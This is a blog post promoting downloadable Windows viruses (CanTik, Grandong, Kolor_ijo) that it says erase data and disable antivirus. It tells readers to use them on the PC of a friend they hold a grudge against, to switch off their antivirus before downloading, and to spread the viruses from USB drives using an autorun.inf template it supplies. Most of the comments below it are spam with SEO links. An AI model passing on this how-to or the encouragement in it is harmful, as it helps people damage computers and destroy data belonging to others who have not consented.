Subscribe For Free Updates!

We'll not spam mate! We promise.

Tuesday, 6 November 2012

DOWNLOAD DEADLY VIRUS [WINDOWS] crack your friend pc with these virus


DOWNLOAD DEADLY VIRUS [WINDOWS]














WHAT ARE DEADLY VIRUS ?

Deadly Virus are used for destruction. They can erase all your data on hard disk, they can self duplication, they limit you from connecting to internet. they limit you from the administrator power, they self copy when removable devices are connected. they disable the antivirus on excluding.

DOWNLOADING DEADLY VIRUS

We are posting some of the best virus available on internet. You can use this viruses to destroy computers. This are multi purpose virus. They have all the property like self duplication, limiting administrator power, self copying to removable devices. You use this virus to trick your friends etc.

INSTRUCTION ON USING THIS DEADLY VIRUS

If you what to spread this virus from removable disk like pen drive etc. You can make autorun the virus. Do not try to run this virus on your pc. It will ruin your softwares, OS and personal files. You can use this on your friends pc if you have any enmity with him. The virus are highly dangerous. I ones more repeat never test this on your computer.

HOW TO AUTORUN DEADLY VIRUS

  • Open notepad copy the below text
  • [autorun]

  • open=VIRUS FILE NAME WITH EXTENSION
  • Change VIRUS NAME WITH EXTENSION. To the name of the virus and with it’s extension.
  • Save the file as autorun.inf
  • Place the autorun.inf and the virus on the root dir of the removable device
  • If you want you can hide the file
  • We have added the deadly virus in a zip file. You should extract the files before adding to autorun
  • Never try to exclude the virus on your computer


DOWNLOAD DEADLY VIRUS

We have added 4 Deadly Virus. They are…
  • CanTik
  • Grandong_all
  • Grandong_C
  • Kolor_ijo
Disable your Antivirus before downloading the deadly virus

Socialize This Post
SOCIALIZE IT →
FOLLOW →
SHARE IT →

24 comments:

  1. Way cool! Some very valid points! I appreciate you writing
    this article and the rest of the website is extremely good.


    My weblog garbage disposal disposer insinkerator installation
    my web site :: garbage disposal maintenance

    ReplyDelete
  2. you are in point of fact a just right webmaster. The web site loading
    speed is incredible. It kind of feels that you are doing any unique
    trick. Moreover, The contents are masterwork. you've performed a wonderful process in this topic!

    Also visit my web blog - pet slings

    ReplyDelete
    Replies
    1. thanks bro i appreciate ur spupport and love

      Delete
  3. You are so cool! I do not believe I have read a single thing like this
    before. So great to find someone with unique thoughts on this subject.
    Really.. thank you for starting this up. This site is one thing that is needed
    on the web, someone with some originality!



    Also visit my homepage: pet week

    ReplyDelete
    Replies
    1. thanks sir i appreciate ur support sure i will visit ur site :)

      Delete
  4. Have you ever thought about publishing an ebook or guest
    authoring on other blogs? I have a blog centered on the same subjects you
    discuss and would really like to have you share some stories/information.

    I know my readers would value your work. If you're even remotely interested, feel free to send me an e mail.

    Feel free to visit my weblog honda s2000 for sale service

    ReplyDelete
  5. This is a good tip especially to those fresh to the blogosphere.
    Short but very precise info… Many thanks for
    sharing this one. A must read article!

    Look into my web blog major league baseball

    ReplyDelete
  6. I go to see daily a few web pages and information sites to read articles, but this webpage offers
    feature based content.

    My blog; hand pole saw pruner

    ReplyDelete
  7. I loved as much as you'll receive carried out right here. The sketch is tasteful, your authored subject matter stylish. nonetheless, you command get bought an impatience over that you wish be delivering the following. unwell unquestionably come more formerly again as exactly the same nearly very often inside case you shield this hike.

    Here is my weblog - holter monitor

    ReplyDelete
  8. I am really impressed with your writing skills and also with
    the layout on your weblog. Is this a paid theme or did you customize it
    yourself? Either way keep up the nice quality writing, it's rare to see a great blog like this one these days.

    Here is my web site rx8 engine for sale

    ReplyDelete
  9. thx its not a paid theme its self customizedddd :D

    ReplyDelete
  10. Please let me know if you're looking for a article author for your weblog. You have some really good articles and I think I would be a good asset. If you ever want to take some of the load off, I'd love to write some content for your blog in exchange
    for a link back to mine. Please blast me an email if interested.
    Many thanks!

    My site: snoring treatments

    ReplyDelete
  11. You wouldn't just go to a club and invite a random stranger home, would you. Alicia's relationship with her abductor did not begin the day she was taken across state lines.
    A chat room is a primarily used by mass media to describe any form of synchronous conferencing,
    or even asynchronous conferencing.

    Here is my website ... chat rooms for singles over 50 chatters

    ReplyDelete
  12. Wow, incredible blog layout! How long have you ever been running a blog for?
    you made running a blog look easy. The whole glance
    of your website is great, as neatly as the content!

    Have a look at my web blog; work boots for men

    ReplyDelete
  13. this is awesome i am definetly using it

    ReplyDelete
  14. Wonderful post! We are linking to ths particularly great content on our site.
    Keep up the grat writing.

    My page :: Navigate To This Website

    ReplyDelete
  15. Excellent goods from you, man. I've understand
    ypur stuff previous to and you're ust too great. I actually like what you have
    acquired here, really like what you're saying and the way in which
    you say it. You make it entertaining and you stikll take care of tto keep iit sensible.
    I can't wait to read far more from you. This is really a tremendous site.


    Havee a look at myy web page great post to read

    ReplyDelete
  16. Are these fake comments? Seriously. This comment section isn't full of "omg who wood do this?!" All of the comments are positive... Anyway, I might download this. I've never seen a website be so honest and bootleg-y at the same time. The grammar is pretty bad, and it says that it's a deadly virus. I want to destroy the computer that I'm using, but I don't want anything spreading to other computers.

    ReplyDelete
  17. I've been using Kaspersky Antivirus for a couple of years, and I recommend this anti virus to everybody.

    ReplyDelete